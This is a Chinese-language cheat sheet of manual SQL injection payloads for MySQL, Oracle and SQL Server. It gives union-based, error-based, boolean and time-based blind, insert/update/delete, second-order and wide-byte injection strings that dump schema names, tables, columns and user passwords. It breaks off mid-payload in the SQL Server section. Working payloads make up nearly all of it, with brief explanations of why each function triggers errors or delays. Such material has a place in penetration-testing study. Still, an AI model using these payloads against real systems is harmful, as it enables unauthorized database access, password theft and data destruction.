0x01 Mysql手工注入
1.1 聯合注入
?id=1' order by 4--+
?id=0' union select 1,2,3,database()--+
?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+
?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+
#group_concat(column_name) 可替換爲 unhex(Hex(cast(column_name+as+char)))column_name
?id=0' union select 1,2,3,group_concat(password) from users --+
#group_concat 可替換爲 concat_ws(',',id,users,password )
?id=0' union select 1,2,3,password from users limit 0,1--+1.2 報錯注入
1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
每個一個報錯語句都有它的原理:
exp()報錯的原理:exp是一個數學函數,取e的x次方,當我們輸入的值大於709將報錯,然後〜取反它的值總會大於709,所以報錯。
updatexml()報錯的原理:由於updatexml的第二個參數需要Xpath格式的字符串,以〜開頭的内容不是xml格式的語法,concat()函數爲串聯連接函數而不符合槼則,但嵌套内的執行結果以錯誤的形式報出,這樣就可以實現報錯注入了。
爆庫:
?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) -- +
爆表:
?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- +
爆字段:
?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- +
爆數據:
?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- +
#concat 也可以放在外面
updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)
這裡需要注意的是它加了連接字符,導致數據中的md5只能爆出31位,這裡可以用分割函數分割出來:
substr(string string,num start,num length);
# string爲字符串,start爲起始位置,length爲長度
?id=1' and updatexml(1,concat(0x7e, substr((select password from users limit 1,1),1,16),0x7e),1) -- +
1.3 盲注
1.3.1 時間盲注
時間盲注也叫延遲注入一般用到函數sleep()BENCHMARK()還可以使用笛卡爾積(盡量不要使用,内容太多會很慢很慢)
一般時間盲注我們還需要使用條件判斷函數
#if(expre1,expre2,expre3)
當 expre1 爲 true 時,返回 expre2,false 時,返回 expre3
# 盲注的同時也配合著 mysql 提供的分割函
substr、substring、left
我們一般喜歡把分割的函數編碼一下,當然不編碼也行,編碼的好處就是可以不用引號,常用到的就有ascii()hex()等等
?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+ ?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+
1.3.2 布爾盲注
?id=1' and substr((select user()),1,1)='r' -- + ?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +
#如果 IFNULL 第一個參數的表達式爲 NULL,則返回第二個參數的備用值,不爲 Null 則輸出值
?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- +
# 若所有的字符串均相同,STRCMP() 返回 0,若根據當前分類次序,第一個參數小於第二個,則返回 -1 ,其它情況返回 1
1.4 插入,刪除,更新
插入,刪除,更新主要是用到盲注和報錯注入,這種注入點不建議使用sqlmap等工具,會産生大量垃圾數據,一般這種注入會出現在編碼,ip頭,留言板等等需要寫入數據的地方,同時這種注入不報錯一般較難發現,我們可以嘗試性插入,引號,雙引號,轉義符\讓語句不能正常執行,然後如果插入失敗,更新失敗,然後深入測試確定是否存在注入
1.4.1 報錯
mysql> insert into admin (id,username,password) values (2,"or updatexml(1,concat(0x7e,(version())),0) or","admin"); Query OK, 1 row affected (0.00 sec) mysql> select * from admin; +------+-----------------------------------------------+----------+ | id | username | password | +------+-----------------------------------------------+----------+ | 1 | admin | admin | | 1 | and 1=1 | admin | | 2 | or updatexml(1,concat(0x7e,(version())),0) or | admin | +------+-----------------------------------------------+----------+ 3 rows in set (0.00 sec) mysql> insert into admin (id,username,password) values (2,""or updatexml(1,concat(0x7e,(version())),0) or"","admin"); ERROR 1105 (HY000): XPATH syntax error: '~5.5.53' #delete 注入很危險,很危險,很危險,切記不能使用 or 1=1 ,or 右邊一定要爲false mysql> delete from admin where id =-2 or updatexml(1,concat(0x7e,(version())),0); ERROR 1105 (HY000): XPATH syntax error: '~5.5.53'
1.4.2 盲注
#int型 可以使用 運算符 比如 加減乘除 and or 異或 移位等等 mysql> insert into admin values (2+if((substr((select user()),1,1)='r'),sleep(5),1),'1',"admin"); Query OK, 1 row affected (5.00 sec) mysql> insert into admin values (2+if((substr((select user()),1,1)='p'),sleep(5),1),'1',"admin"); Query OK, 1 row affected (0.00 sec) # 字符型注意閉合不能使用and mysql> insert into admin values (2,''+if((substr((select user()),1,1)='p'),sleep(5),1)+'',"admin"); Query OK, 1 row affected (0.00 sec) mysql> insert into admin values (2,''+if((substr((select user()),1,1)='r'),sleep(5),1)+'',"admin"); Query OK, 1 row affected (5.01 sec) # delete 函數 or 右邊一定要爲 false mysql> delete from admin where id =-2 or if((substr((select user()),1,1)='r4'),sleep(5),0); Query OK, 0 rows affected (0.00 sec) mysql> delete from admin where id =-2 or if((substr((select user()),1,1)='r'),sleep(5),0); Query OK, 0 rows affected (5.00 sec) # update 更新數據内容 mysql> select * from admin; +------+----------+----------+ | id | username | password | +------+----------+----------+ | 2 | 1 | admin | | 2 | 1 | admin | | 2 | 1 | admin | | 2 | admin | admin | +------+----------+----------+ 4 rows in set (0.00 sec) mysql> update admin set id="5"+sleep(5)+"" where id=2; Query OK, 4 rows affected (20.00 sec) Rows matched: 4 Changed: 4 Warnings: 0
1.5 二次注入與寬字節注入
二次注入的語句:在沒有被單引號包裹的sql語句下,我們可以用16進制編碼他,這樣就不會帶有單引號等。
mysql> insert into admin (id,name,pass) values ('3',0x61646d696e272d2d2b,'11');
Query OK, 1 row affected (0.00 sec)
mysql> select * from admin;
+----+-----------+-------+
| id | name | pass |
+----+-----------+-------+
| 1 | admin | admin |
| 2 | admin'111 | 11111 |
| 3 | admin'--+ | 11 |
+----+-----------+-------+
4 rows in set (0.00 sec)二次注入在沒有二進制的情況比較難發現,通常見於注冊,登錄惡意賬戶後,數據庫可能會因爲惡意賬戶名的問題,將admin'-+誤認爲admin帳戶
寬字節注入:針對目標已達到一定的防護,單引號轉換爲 \' ,mysql轉換 \ 編碼爲 %5c ,寬字節中兩個字節代表一個漢字,所以把 %df 加上 %5c 就變成了一個漢字“運”,使用這種方法成功繞過過轉義,就是所謂的寬字節注入
id=-1%df' union select...
# 沒使用寬字節
%27 -> %5C%27
# 使用寬字節
%df%27 -> %df%5c%27 -> 運'
0x02 Oracle手工注入
2.1 聯合注入
?id=-1' union select user,null from dual-- ?id=-1' union select version,null from v$instance-- ?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)-- ?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=2)-- ?id=-1' union select username,passwd from users-- ?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)--
2.2 報錯注入
?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))-- ?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%))-- ?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit= 3))-- ?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=3))-- ?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))--
2.3 盲注
2.3.1 布爾盲注
既然是盲注,那麽肯定涉及到條件判斷語句,Oracle除了使用if else結束,如果這種複雜的,還可以使用encode()函數。
語法:decode(條件,值1,返回值1,值2,返回值2,...值n,返回值n,更改值);
該函數的含義如下:
IF 條件=值1 THEN
RETURN(返回值1)
ELSIF 條件=值2 THEN
RETURN(返回值2)
......
ELSIF 條件=值n THEN
RETURN(返回值n)
ELSE
RETURN(缺省值)
END IF
?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)-- ?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)-- ?id=1' and ascii(substr(user,1,1))> 64-- # 二分法
2.3.2時間盲注
可使用DBMS_PIPE.RECEIVE_MESSAGE('任意值',延遲時間)函數進行時間盲注,這個函數可以指定延遲的時間
?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--
?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--0x03 SQL Server手工注入
3.1 聯合注入
?id=-1' union select null,null-- ?id=-1' union select @@servername, @@version-- ?id=-1' union select db_name(),suser_sname()-- ?id=-1' union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null-- ?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null-- ?id--1' union select (select top 1 table_ name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null-- ?id=-1' union select (select top 1 column name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null--- ?id=-1' union select (select top 1 username from users where username not in (select top 3 username from users)),null--
3.2 報錯注入
?id=1' and 1=(select 1/@@servername)-- ?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))--
3.3 盲注
3.3.1 布爾盲注
?id=1' and ascii(substring((select db_ name(1)),1,1))> 64--
3.3.2時間盲注
?id= 1';if(2>1) waitfor delay '0:0:5'-- ?id= 1';if(ASCII(SUBSTRING((select db_name(1)),1,1))> 64) wai
